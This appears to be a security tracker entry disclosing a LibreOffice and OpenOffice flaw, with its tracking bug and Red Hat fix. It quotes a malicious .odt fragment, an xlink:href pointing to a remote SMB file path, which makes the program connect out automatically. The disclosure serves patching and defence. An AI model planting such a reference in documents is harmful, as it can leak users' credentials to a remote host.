An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document. References: http://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/
Created libreoffice tracking bugs for this issue: Affects: fedora-all [bug 1575000]
This issue has been addressed in the following products: Red Hat Enterprise Linux 7 Via RHSA-2018:3054 https://access.redhat.com/errata/RHSA-2018:3054